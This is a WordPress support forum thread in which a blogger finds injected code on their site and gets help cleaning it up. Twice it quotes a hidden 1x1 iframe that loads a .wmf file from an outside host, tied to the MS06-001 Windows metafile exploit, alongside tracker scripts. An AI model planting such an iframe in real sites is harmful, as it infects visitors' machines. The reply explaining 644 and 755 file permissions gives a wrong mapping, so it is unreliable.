WordPress.org

Ready to get started?Download WordPress

Forums

How did a site write javascript to my blog? (12 posts)

  1. Roar
    Member
    Posted 8 years ago #

    All of a sudden, people are saying my site is giving them a virus alert, and when I view the source, I have this odd javascript on the top of the first page.

    I am looking through all the pages via the theme editor and I cannot find that to make it go away!

    help?

    <iframe src="http://www.wnplake.net/lgs/1.wmf" height=1 width=1></iframe>
    <SCRIPT language="javascript"><!--
    var tracker_loaded = 0;
    //--></SCRIPT>
    <SCRIPT language="javascript" SRC="http://www.hitscreen.com/html/tracker.js">
    </SCRIPT>
    <SCRIPT language="javascript"><!--
    if(tracker_loaded) {
    document.writeln(make_stats_now('fcep', 'http://www.hitscreen.com/cgi-bin/x.cgi'));
    };
    //--></SCRIPT>
    <SCRIPT language="javascript"><!--
    document.write("<"+"!--");
    //--></SCRIPT>
    <NOSCRIPT>
    <A HREF="http://www.hitscreen.com/" target="_top"><IMG
    SRC="http://www.hitscreen.com/cgi-bin/x.cgi?NAVG=Tracker&username=fcep" BORDER=0></A>
    </NOSCRIPT>
    <SCRIPT language="javascript"><!--
    document.write("--"+">");
    //--></SCRIPT>

  2. Mark (podz)
    Support Maven
    Posted 8 years ago #

    I'm not seeing it.
    Check the index.php at domain root, not just the one in the themes directory.

    It's an exploit by a script on the host server that finds writable files and puts links like this inside.
    Tell your host and if they don't seem bothered, make plans to move to a good host.

  3. j0d
    Member
    Posted 8 years ago #

    if you want hosting we do a free hosting plan, 25MB space, 1 SQL, a small text ad is required though, email me for more details.

    I've had problems with sucky hosts before, really pissed me off.

  4. Roar
    Member
    Posted 8 years ago #

    I will have to let them know. I found the bit in the index.php.

    I've used esosoft since 1997 and this is the first problem! Can you believe?

    But thanks and I will email them right now.

  5. whooami
    Member
    Posted 8 years ago #

    its all about those permissions -- posts like these arent going to be to be going down in number any time soon, unfortunately.

  6. Roar
    Member
    Posted 8 years ago #

    Actually....

    there is an exploit in Windows. (and of course, Internet Explorer!)

    Here is the security bulletin...
    http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx

    and here is the code where it snuck it in...
    <iframe src="http://www.wnplake.net/lgs/1.wmf" height=1 width=1></iframe>

    The virus comes in via that wmf file somehow. Hmmm. Not sure if I got it or they got it?

    *stabs Internet Explorer repeatedly*

  7. vkaryl
    Member
    Posted 8 years ago #

    Um. This was discussed here about a week ago, with links to fixes posted. As usual, I can't find the relevant post, since search is such a pile of you-know....

  8. whooami
    Member
    Posted 8 years ago #

    actually, that's old news rorie, but it simply being "out there" doesnt account for it making it onto your site.

    Thats in your permissions.

  9. Bhoney
    Member
    Posted 8 years ago #

    How can I make sure my permissions are set as they should be without going through every single file and checking?

    Thanks :)

  10. vkaryl
    Member
    Posted 8 years ago #

    Generally, your files should be 644 and your folders 755. It's fairly easy to do a quick scan using an ftp client such as WS_FTP Pro: you'll see in the right pane a list of your files and folders, and each will have some letters to the right of the file or folder name.

    644 = rw rw rw (or sometimes rw-rw-rw)
    755 = rws rx rx (or sometimes rwx-rx-rx)

  11. Bhoney
    Member
    Posted 8 years ago #

    Thank V :)

  12. Roar
    Member
    Posted 8 years ago #

    Sorry, vkaryl. I did try searching. In case anyone else reads this, it also hit the wp-blog-header.php file.

    and my permissions are all correct. :(

    OH! And here is the original post.
    http://wordpress.org/support/topic/54434?replies=19

    :) I did not know to search for wmf when I had the first error.

    Thank you, I always appreciate all the quick help here.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags